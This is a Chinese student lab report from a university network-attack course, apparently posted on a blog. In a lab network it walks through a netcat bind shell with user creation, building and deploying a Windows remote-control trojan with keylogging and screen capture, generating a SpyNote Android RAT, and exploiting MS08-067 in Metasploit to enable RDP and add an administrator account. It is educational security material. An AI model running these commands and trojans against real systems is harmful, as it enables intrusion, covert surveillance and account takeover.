第四次实验

 

中国人民公安大学

Chinese people public security university

 

网络对抗技术

实验报告

 

实验四

恶意代码技术

 

 

 

学生姓名

李佳

年级

2015级

区队

二区队

指导教师

高见

 

 

信息技术与网络安全学院

 

2016—2017 学年   学期

一、实验目的

1通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

2.了解并熟悉常用的网络攻击工具,木马的基本功能

3达到巩固课程知识和实际应用的目的。

二、实验要求

1认真阅读每个实验内容,需要截图的题目,需清晰截图并对截图进行标注和说明。

2.文档要求结构清晰图文表达准确,标注规范。推理内容客观、合理、逻辑性强。

3软件工具可使用NCMSF

4.实验结束后,保留电子文档

、实验步骤

1.准备

提前做好实验准备,实验前应把详细了解实验目的、实验要求和实验内容,熟悉准备好实验用的软件工具,按照实验内容和要求提前做好实验内容的准备

2.实验环境

描述实验所使用的硬件和软件环境(包括各种软件工具)

开机并启动软件office20032007浏览器、加解密软件

3.实验过程

1)启动系统和启动工具软件环境。

2)用软件工具实现实验内容。

4.实验报告

按照统一要求的实验报告格式书写实验报告。把按照模板格式编写的文档嵌入到实验报告文档中,文档按照规定的书写格式书写,表格要有表说图形要有图说。

任务一 利用NC控制电脑

步骤一:

      在受害者的机器 (同学A)IP地址为:192.168.163.128
      输入下面的命令:
  nc.exe -l -p port -e cmd.exe   进入监听模式

步骤二:  攻击者的机器.(同学B)IP地址为:192.168.163.130

输入下面的命令:
  nc ip  port

 

步骤三:

    shell中,利用net user 用户名 密码 /add ,添加一个用户,并在受害者的机器中使用 net user 命令进行验证。

 

 

 继续使用NC  进行文件的删除

 

任务二 利用木马控制电脑

步骤一:

    攻击者的机器. (同学A)IP地址为:192.168.163.128
      打开上兴远程控制程序  生成木马sx.sever

 

步骤三:

将生成的木马可执行程序拷贝到受害者的机器,并双击运行。 

 

步骤四:

在控制端中查看木马上线情况,并对以下功能每个进行测试和截图。 

 

             文件管理,尝试拷贝文件

 

 

             屏幕控制,尝试获取桌面

             键盘记录,尝试获取对方击键记录

             会话管理,重启对方机器,查看是否能自启动上线

 

计算机重启

控制的主机消失

被控计算机上线,重启之后。

 

 

 

             会话管理,卸载对方的木马。

 

 最后卸载服务端,即可脱离控制。

任务三 Android远控实践 

实验步骤:

一、打开spynote软件。

 

二、配置并打开监听端口

    点击Listen Port,在弹出的对话框中输入端口号1205,并点击Add按钮,最后点击OK,成功监听本地端口。

 

三、配置并生成木马

                                   本地主机的IP地址

 

   (1)点击Build Client按钮,弹出对话框

 

  (2)配置回连IP和端口,IP地址填写运行spynote的机器IP,端口填写监听的端口号,本次填写1205端口。

 

    3)配置相关属性信息。

 

    4)最后点击Build按钮,在选择框中选择和spynote同处在一个文件夹中Patch-release.apk

 

    5)完成后,自动打开APK生成所在的文件夹。

 

四、将木马安装在Android模拟其中。

 

五、Spynote中控制手机

 

可以在spynote中看到有一台机器上线,并可以查看其基本信息。

 

在该机器中右键,可以看到可以对该机器进行控制的功能,从中选择4个以上的项目进行实验。

1.进行地理位置的获取

 

2.管理文件

3.进进设置被控Android手机

 

    4.查看被控手机安装的APP

.2 实训环境

 

Windows XP SP3

IP:192.168.163.130

 

Kali Linux 

IP:192.168.163.132

 

.3 实训原理

 

漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

.4 漏洞利用过程

在msfconsole使用search命令搜索MS08067漏洞攻击程序

从结果中得到

exploit/windows/smb/ms08_067_netapi

表示当前msf框架中包含MS08067漏洞的攻击插件。

使用use命令调用MS08067漏洞攻击程序

use exploit/windows/smb/ms08_067_netapi

进入msf的交互式命令窗口下,使用show options 命令查看需要设置的选项。

从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)使用 set 命令设置 Module Options,此处需要设置目标IP即 set RHOST 192.168.163.130

使用 set 命令设置后,可再使用show options 命令查看设置情况

从中可以看出目标IP已经设置好接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞。

例演示的XP系统为WinXP SP3 简体中文版对应的编号为34

使用set target 命令设置目标,此处即为set target 34

此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击

执行exploit命令后得到一个meterpreter命令行交互窗口

在meterpreter中输入run getgui -e 命令,可以打开RDP(远程桌面)服务,端口号3389。

继续输入shell即可进入CMD窗口

  在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务(如果上面已经开启了,这步可以省略)。 

  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 

使用 DIR 看是否连接上

netstat -an命令查看端口是否开放,从图中可以看到已经开放3389端口。

接着使用net user命令查看XP系统中的用户

 在平台中获取shell之后,继续在命令行添加账户和管理员权限。

net user user pass /add  net localgroup administrators /add   

最后开启远程桌面,利用刚在添加的账户登陆被攻击机器。 

rdesktop -a 16 -u user  -p 123 192.168.163.130:3389

 

posted @ 2018-09-30 17:34  p201521420010  阅读(199)  评论(0编辑  收藏  举报